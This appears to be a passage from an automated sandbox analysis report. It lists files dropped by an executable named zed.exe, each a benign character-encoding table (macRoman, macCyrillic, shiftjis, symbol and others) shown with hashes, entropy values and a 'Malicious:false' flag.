                                                                                                                                                                                                                                            SSDEEP:24:8jHVBUlJvRj7SOVbusZhAMiZyi77qHVPJSf2FcVDu1LEe4qPPMl2J89:8jMlBVnrAMiwMmHEmJ4IMgi9
                                                                                                                                                                                                                                            MD5:10850BCFB943318284D6191494EBD7D5
                                                                                                                                                                                                                                            SHA1:237D5DDF7969A422991F17021244D13A2BB0DE92
                                                                                                                                                                                                                                            SHA-256:81ECA6840B87F2DEF9FCDD171A55C2D71A49386D88401CE927AE57D7DDD7AAAA
                                                                                                                                                                                                                                            SHA-512:D797781C228B70D2D83DB8ABA08F840CE49846C9473CC89A2E316900D9E08A63142E68AD9ABBB2EF67BF9F1D392772FAB36CCC09632022A1437AE27C11F2284F
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: macCentEuro, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..00C40100010100C9010400D600DC00E10105010C00E4010D0106010700E90179..017A010E00ED010F01120113011600F3011700F400F600F500FA011A011B00FC..202000B0011800A300A7202200B600DF00AE00A92122011900A822600123012E..012F012A22642265012B0136220222110142013B013C013D013E0139013A0145..0146014300AC221A01440147220600AB00BB202600A00148015000D50151014C..20132014201C201D2018201900F725CA014D0154015501582039203A01590156..01570160201A201E
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1116
                                                                                                                                                                                                                                            Entropy (8bit):3.3992482002374516
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:8ULyHVBUlJvRj7SOVbusZhAMiZyi77qsTMdKxOZwwL+KR5D/jlJy6QWky:8ULyMlBVnrAMiwMmOsL+KR5DblE85
                                                                                                                                                                                                                                            MD5:A60FBDE33D13C732095713D1AB6713AB
                                                                                                                                                                                                                                            SHA1:4B0EB443F2D0E4B8DB7D0435F9311E5F9A625123
                                                                                                                                                                                                                                            SHA-256:BBE6F5EBB5EAB08C91DF7D524FAF39B03AA8B9F84C67ABA0553A84EC56668CB9
                                                                                                                                                                                                                                            SHA-512:3EEBA6BA3FCD875AFBD5DF41EDC21E872416A48D03343232904CC99CAF913045DAF7B1A1ACD0949EF794AD7B6C9AE8F93808423FFC4B67718E732B2FF5D9B6D7
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: macCroatian, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..00C400C500C700C900D100D600DC00E100E000E200E400E300E500E700E900E8..00EA00EB00ED00EC00EE00EF00F100F300F200F400F600F500FA00F900FB00FC..202000B000A200A300A7202200B600DF00AE0160212200B400A82260017D00D8..221E00B122642265220600B522022211220F0161222B00AA00BA03A9017E00F8..00BF00A100AC221A01922248010600AB010C202600A000C000C300D501520153..01102014201C201D2018201900F725CAF8FF00A9204420AC2039203A00C600BB..201300B7201A201E
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1116
                                                                                                                                                                                                                                            Entropy (8bit):3.4178221849964903
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:8dHVBUlJvRj7SOVbusZhAMiZyi77qb+SAJlz9a4piS1yk+5yye3cJY:8dMlBVnrAMiwMm8Y6zUk+UVsJY
                                                                                                                                                                                                                                            MD5:C390D66441AC61CCF0A685CA5EE0BC1C
                                                                                                                                                                                                                                            SHA1:FCAE825B54400B9D736EF22A613E359E3F0FA6C2
                                                                                                                                                                                                                                            SHA-256:76EFE571ADDA7AED467F146CB0BD3A2351F2A720508EA0642C419F5347789CAA
                                                                                                                                                                                                                                            SHA-512:C891DB15E0F600965885DE6745EDD2A4E3A6A20CA30A9AAE89CBD8C429F8455C4AF7F2FC053FB3D730D8544AB6A6E78E769DB93DAD7B29868B746FA10373F021
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: macCyrillic, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0410041104120413041404150416041704180419041A041B041C041D041E041F..0420042104220423042404250426042704280429042A042B042C042D042E042F..202000B0049000A300A7202200B6040600AE00A9212204020452226004030453..221E00B122642265045600B504910408040404540407045704090459040A045A..0458040500AC221A01922248220600AB00BB202600A0040B045B040C045C0455..20132014201C201D2018201900F7201E040E045E040F045F211604010451044F..0430043104320433
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1116
                                                                                                                                                                                                                                            Entropy (8bit):3.870022681111701
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:87JMHkUlJvRjmf9RCsUBOdXsCbbNviANpkDP1XFAoE4xSF5HrBPkdn:87KvlA9RCs6CXrViANUP1XFA9eSvdPKn
                                                                                                                                                                                                                                            MD5:DCE78527E3A7B7CB1DE9EE5FAF12AFC6
                                                                                                                                                                                                                                            SHA1:20F4A3F4DB6B3422C04EBB6B21A568E4C173F9C1
                                                                                                                                                                                                                                            SHA-256:062E31D48DC33160999074E49205E08C3655DFF91C2C87F254522E6EBCE2DD96
                                                                                                                                                                                                                                            SHA-512:627F5FD2F12B341F2D7EE9032946FE057C4AC74D99687178CEA98B3E150307BB6AA2495B0FA46400760D467E2BF589BE31E998E25CE1D1E8465DA61F22047345
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: macDingbats, single-byte..S..003F 1 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..00202701270227032704260E2706270727082709261B261E270C270D270E270F..2710271127122713271427152716271727182719271A271B271C271D271E271F..2720272127222723272427252726272726052729272A272B272C272D272E272F..2730273127322733273427352736273727382739273A273B273C273D273E273F..2740274127422743274427452746274727482749274A274B25CF274D25A0274F..27502751275225B225BC25C6275625D727582759275A275B275C275D275E007F..F8D7F8D8F8D9F8DAF8DBF8DCF8DDF8DEF8DFF8E0F8E1F8E2F8E3F8E4008E008F..0090009100920093009400950096009700980099009A009B009C009D009E009F..0000276127622763276427652766276726632666266526602460246124622463..2464246524662467246824692776277727782779277A277B277C277D277E277F..2780278127822783278427852786278727882789278A278B278C278D278E278F..2790279127922793279421922194219527982799279A279B279C279D279E279F..27A027A127A227A3
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1113
                                                                                                                                                                                                                                            Entropy (8bit):3.4954458011071323
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:8dOHVBUlJvRj7SOVbusZhAMiZyi77qJlbaBMD2aSY5us36Ekp1ysOSU2imR:8kMlBVnrAMiwMm7aKPVusqx1ysOJjmR
                                                                                                                                                                                                                                            MD5:0CC92F685A4132BE4B030006670D81CE
                                                                                                                                                                                                                                            SHA1:13B1074A90055E9EA061A6206A9C004DA29967A9
                                                                                                                                                                                                                                            SHA-256:1AABE561B5C944ABD11C293D4ACAC0F3A4A5A9E84A0342D066F4E3E992348895
                                                                                                                                                                                                                                            SHA-512:E1AF3D47D681CD68B6063DEC1241631CABE86FE835232FA73D855AC74D0175540D46511282BE7198A67A37970A5D05CDECF55C10424ED9C1413C108F116094D9
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: macGreek, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..00C400B900B200C900B300D600DC038500E000E200E4038400A800E700E900E8..00EA00EB00A3212200EE00EF202200BD203000F400F600A600AD00F900FB00FC..2020039303940398039B039E03A000DF00AE00A903A303AA00A7226000B000B7..039100B12264226500A503920395039603970399039A039C03A603AB03A803A9..03AC039D00AC039F03A1224803A400AB00BB202600A003A503A7038603880153..20132015201C201D2018201900F70389038A038C038E03AD03AE03AF03CC038F..03CD03B103B203C803B
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1115
                                                                                                                                                                                                                                            Entropy (8bit):3.3991839018654573
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:8KHVBUlJvRj7SOVbusZhAMiZyi77qscqMVmOZmk/LYRldjY/g4JyMWG:8KMlBVnrAMiwMmzqi/LYRlYBEXG
                                                                                                                                                                                                                                            MD5:747ADBE54D6992467415E322326FA1B9
                                                                                                                                                                                                                                            SHA1:5E3967B5DDF3A6DBF07E90ED6B9B9C2F3F3F35FE
                                                                                                                                                                                                                                            SHA-256:6FD08CE6FBA521D51E8058DE5C2DBD6583B80306A8BE7D015361F76314E70A35
                                                                                                                                                                                                                                            SHA-512:A04B946993985BF1F8FBA3A7A9AD3838F43F8F27F69B1FB1015D9DC8612AAFCE24E30CBC1FCABBDFB359FD487D51F70F18DA0CDA4A87749A2C82309CEB054849
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: macIceland, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..00C400C500C700C900D100D600DC00E100E000E200E400E300E500E700E900E8..00EA00EB00ED00EC00EE00EF00F100F300F200F400F600F500FA00F900FB00FC..00DD00B000A200A300A7202200B600DF00AE00A9212200B400A8226000C600D8..221E00B12264226500A500B522022211220F03C0222B00AA00BA03A900E600F8..00BF00A100AC221A01922248220600AB00BB202600A000C000C300D501520153..20132014201C201D2018201900F725CA00FF0178204420AC00D000F000DE00FE..00FD00B7201A201E2
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):48813
                                                                                                                                                                                                                                            Entropy (8bit):3.3767502114972077
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:768:K/RPrUHiJrKWkyY/W2wHiwWnwWOORY+gutSJi:KVUidzJCurDGSk
                                                                                                                                                                                                                                            MD5:3DCD22325E0194AAD4959C939B1DE24D
                                                                                                                                                                                                                                            SHA1:ABEF1372FBDA83714CE29E015D9A198D4B37B21C
                                                                                                                                                                                                                                            SHA-256:47007D9EBF4D34C6CE3599E50AFC7C1CF8129B88994DE2C2A857C09003F9CD2B
                                                                                                                                                                                                                                            SHA-512:B8ADFD2315EA38E5F7D4DED219759380069AAB539F1B5AAA5626CE32428CBBEB5E8215AD8351E023BCF72FA4DC30AB40CF59D6D45E33B6D1A6B41BEBFD4BD4C2
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: macJapan, multi-byte..M..003F 0 46..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0080000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..00A0FF61FF62FF63FF64FF65FF66FF67FF68FF69FF6AFF6BFF6CFF6DFF6EFF6F..FF70FF71FF72FF73FF74FF75FF76FF77FF78FF79FF7AFF7BFF7CFF7DFF7EFF7F..FF80FF81FF82FF83FF84FF85FF86FF87FF88FF89FF8AFF8BFF8CFF8DFF8EFF8F..FF90FF91FF92FF93FF94FF95FF96FF97FF98FF99FF9AFF9BFF9CFF9DFF9EFF9F..0000000000000000000
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1113
                                                                                                                                                                                                                                            Entropy (8bit):3.4060725247347516
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:8THVBUlJvRj7SOVbusZhAMiZyi77qsTMVmOZmk/LYRldjBpmg4JyMWG:8TMlBVnrAMiwMmOi/LYRlTsBEXG
                                                                                                                                                                                                                                            MD5:34691FADC788B85D98F63159640C7DD0
                                                                                                                                                                                                                                            SHA1:C8B3D084D3E831EFF6ECEF71B2029545F214C3D4
                                                                                                                                                                                                                                            SHA-256:C83D971D6BC0284EF323C197896E38C57A5FF44784E451EC2997EDA70C0DD85C
                                                                                                                                                                                                                                            SHA-512:77D5676F9B7AF7FD1D612A1C426889D8F2C0191887E180B78C4AA42202928A1B3078B76BD3C5F5ABB2A5CE1AE913E3CA6EFDE0483D2A2B0EFC173EF25EAE1D67
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: macRoman, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..00C400C500C700C900D100D600DC00E100E000E200E400E300E500E700E900E8..00EA00EB00ED00EC00EE00EF00F100F300F200F400F600F500FA00F900FB00FC..202000B000A200A300A7202200B600DF00AE00A9212200B400A8226000C600D8..221E00B12264226500A500B522022211220F03C0222B00AA00BA03A900E600F8..00BF00A100AC221A01922248220600AB00BB202600A000C000C300D501520153..20132014201C201D2018201900F725CA00FF0178204420AC2039203AFB01FB02..202100B7201A201E203
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1115
                                                                                                                                                                                                                                            Entropy (8bit):3.412326247178521
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:8tHVBUlJvRj7SOVbusZhAMiZyi77qsTMVZ5OZwYRldj/T9g4JyMWG:8tMlBVnrAMiwMmOA7YRlFT9BEXG
                                                                                                                                                                                                                                            MD5:04E25073BFB0019D8381B72F7B433F00
                                                                                                                                                                                                                                            SHA1:B63B0AD9F10A44B0DDD12A3BDBCDEB2992D6D385
                                                                                                                                                                                                                                            SHA-256:0B805DAF21D37D702617A8C72C7345F857695108D905FF378791F291CEA150F0
                                                                                                                                                                                                                                            SHA-512:0514EC054676C15C65B01B02747CDBAD79BC89FD1A24A17797A8729752FB748FEDBE920E7BBFF41A6DA4BA99002E3B8DB674D53E30485DC36F6BF737EAF11702
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: macRomania, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..00C400C500C700C900D100D600DC00E100E000E200E400E300E500E700E900E8..00EA00EB00ED00EC00EE00EF00F100F300F200F400F600F500FA00F900FB00FC..202000B000A200A300A7202200B600DF00AE00A9212200B400A822600102015E..221E00B12264226500A500B522022211220F03C0222B00AA00BA21260103015F..00BF00A100AC221A01922248220600AB00BB202600A000C000C300D501520153..20132014201C201D2018201900F725CA00FF0178204400A42039203A01620163..202100B7201A201E2
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1112
                                                                                                                                                                                                                                            Entropy (8bit):3.6062142626989004
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:88HVBUlJvRj7SOVbusZhAMiZyi77qqJipJwHmEU4AyqU+TpH:88MlBVnrAMiwMmqJ8Jf4AyqUe
                                                                                                                                                                                                                                            MD5:06DC6BA6E4A75CD7FF2D7A4248912C61
                                                                                                                                                                                                                                            SHA1:23FB16763A8F11EF48E805E4F453C2F812D48FC4
                                                                                                                                                                                                                                            SHA-256:A1802A2FEB01B255EC7C17425EEE4525372DF8CE226F4047D149172EB438F913
                                                                                                                                                                                                                                            SHA-512:41A487EC5C36C17B2746C5DC770882A836E6E75CF6A14C31595EB211022F0476BD3B953497C447F21554769F127C3A56E5B6EF8FB3C20A8AFF8C67E0CC94359D
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: macThai, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..00AB00BB2026F88CF88FF892F895F898F88BF88EF891F894F897201C201DF899..FFFD2022F884F889F885F886F887F888F88AF88DF890F893F89620182019FFFD..00A00E010E020E030E040E050E060E070E080E090E0A0E0B0E0C0E0D0E0E0E0F..0E100E110E120E130E140E150E160E170E180E190E1A0E1B0E1C0E1D0E1E0E1F..0E200E210E220E230E240E250E260E270E280E290E2A0E2B0E2C0E2D0E2E0E2F..0E300E310E320E330E340E350E360E370E380E390E3AFEFF200B201320140E3F..0E400E410E420E430E44
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1115
                                                                                                                                                                                                                                            Entropy (8bit):3.422718883614008
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:8QjHVBUlJvRj7SOVbusZhAMiZyi77qsTMVmOZmk/LYRldD8g4JyS:88MlBVnrAMiwMmOi/LYRlWBES
                                                                                                                                                                                                                                            MD5:4EA94A0DB35BED2081A2CC9D627A8180
                                                                                                                                                                                                                                            SHA1:AB2AC3ADA19F3F656780FF876D5B536A8DCE92C6
                                                                                                                                                                                                                                            SHA-256:AFB66138EBE9B87D8B070FE3B6E7D1A05ED508571E9E5B166C3314069D59B4E4
                                                                                                                                                                                                                                            SHA-512:7888F560D3728732BE1B7DCE49ECB61F3399CEF11191F4116C891E1D147B2A90ED8FB4A5E7B51904A001C47750BD9EB1B15EA5BA5B4EC5D69CDE7704B69529AD
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: macTurkish, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..00C400C500C700C900D100D600DC00E100E000E200E400E300E500E700E900E8..00EA00EB00ED00EC00EE00EF00F100F300F200F400F600F500FA00F900FB00FC..202000B000A200A300A7202200B600DF00AE00A9212200B400A8226000C600D8..221E00B12264226500A500B522022211220F03C0222B00AA00BA03A900E600F8..00BF00A100AC221A01922248220600AB00BB202600A000C000C300D501520153..20132014201C201D2018201900F725CA00FF0178011E011F01300131015E015F..202100B7201A201E2
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1115
                                                                                                                                                                                                                                            Entropy (8bit):3.4157626428238723
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:8TzHVBUlJvRj7SOVbusZhAMiZyi77qb+SAJlz9a4piS1yk+5yye3cJd:8PMlBVnrAMiwMm8Y6zUk+UVsJd
                                                                                                                                                                                                                                            MD5:A5B48D6F2678579CBE6EA094A4655071
                                                                                                                                                                                                                                            SHA1:A13A41D530B21CE8443AFD7E811286537C5BA9C7
                                                                                                                                                                                                                                            SHA-256:F7E11736C9FF30102B31EC72272754110193B347433F4B364921E8F131C92BF0
                                                                                                                                                                                                                                            SHA-512:612F9D528CE940B5CA9E67CB127013A104655207511F4CF39C8696A127E6A8F4867F5603DCFB78C25A55668C6EE70F2997A8D1626F6F1DD44B19260967F17097
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: macUkraine, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0410041104120413041404150416041704180419041A041B041C041D041E041F..0420042104220423042404250426042704280429042A042B042C042D042E042F..202000B0049000A300A7202200B6040600AE00A9212204020452226004030453..221E00B122642265045600B504910408040404540407045704090459040A045A..0458040500AC221A01922248220600AB00BB202600A0040B045B040C045C0455..20132014201C201D2018201900F7201E040E045E040F045F211604010451044F..04300431043204330
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):42552
                                                                                                                                                                                                                                            Entropy (8bit):3.5565924983274857
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:768:w/RPrUHiJrwWkyY/W2wHiwWnwWOORY+gutSX:wVUid5JCurDGSX
                                                                                                                                                                                                                                            MD5:EEB45AF9D7104872FE290D1EC18AB169
                                                                                                                                                                                                                                            SHA1:A80CF4EA46301F0B8B4F0BC306270D7103753871
                                                                                                                                                                                                                                            SHA-256:4A15ED210126BCDAE32543F60EB1A0677F985F32D49FCE923B9FAE8C5BCF3DA4
                                                                                                                                                                                                                                            SHA-512:C359042B04441AA50E536B23EEA0C6C7B2C1893DFB9CDB5459D3B46945D3BB50FD7A32A4F4E26A83622E76D3D2BB0DBBC3D1F3FB87AAF40520A243165B82AB34
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: shiftjis, multi-byte..M..003F 0 40..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0080000000000000000000850086008700000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000FF61FF62FF63FF64FF65FF66FF67FF68FF69FF6AFF6BFF6CFF6DFF6EFF6F..FF70FF71FF72FF73FF74FF75FF76FF77FF78FF79FF7AFF7BFF7CFF7DFF7EFF7F..FF80FF81FF82FF83FF84FF85FF86FF87FF88FF89FF8AFF8BFF8CFF8DFF8EFF8F..FF90FF91FF92FF93FF94FF95FF96FF97FF98FF99FF9AFF9BFF9CFF9DFF9EFF9F..0000000000000000000
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1111
                                                                                                                                                                                                                                            Entropy (8bit):3.73983895892791
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:SdHkUlJvRjvRV7ZQsoRmSds2AsSemxUs+Jw1Viv6ObTXyn:avlJV7ZQsoRmosGSPxU/JOm6wTXyn
                                                                                                                                                                                                                                            MD5:D59E748D863A5FAEF0CEEC2564E041A3
                                                                                                                                                                                                                                            SHA1:4FFF3BE37F50C090FFC581F1C7769E20281E90C3
                                                                                                                                                                                                                                            SHA-256:9660537A7B62996478555C6F57C1962C78FB3972F19370B2E395C44842818A1F
                                                                                                                                                                                                                                            SHA-512:BF8FD0CF1CC55564C46976F53F441B26819ADBA7AB7BB04FF3FF5A313366FC3049DF29A839CCCB05EDEF4A7ECBB49FFCA62518EDA90AF2D7781874A8435073AE
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: symbol, single-byte..S..003F 1 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002122000023220300250026220D002800292217002B002C2212002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..22450391039203A70394039503A603930397039903D1039A039B039C039D039F..03A0039803A103A303A403A503C203A9039E03A80396005B2234005D22A5005F..F8E503B103B203C703B403B503C603B303B703B903D503BA03BB03BC03BD03BF..03C003B803C103C303C403C503D603C903BE03C803B6007B007C007D223C007F..0080008100820083008400850086008700880089008A008B008C008D008E008F..0090009100920093009400950096009700980099009A009B009C009D009E009F..000003D2203222642044221E0192266326662665266021942190219121922193..00B000B12033226500D7221D2202202200F72260226122482026F8E6F8E721B5..21352111211C21182297229522052229222A2283228722842282228622082209..2220220700AE00A92122220F221A22C500AC2227222821D421D021D121D221D3..22C42329F8E8F8E9F8EA2
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1112
                                                                                                                                                                                                                                            Entropy (8bit):3.0553142874336943
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:ZlHVBUlJvRj7SOVbusZhAMiZyi77qsDHmEU4AyqU+TWwdd:PMlBVnrAMiwMmss4AyqUSd
                                                                                                                                                                                                                                            MD5:467A67DE6809B796B914F5BFF98EF46D
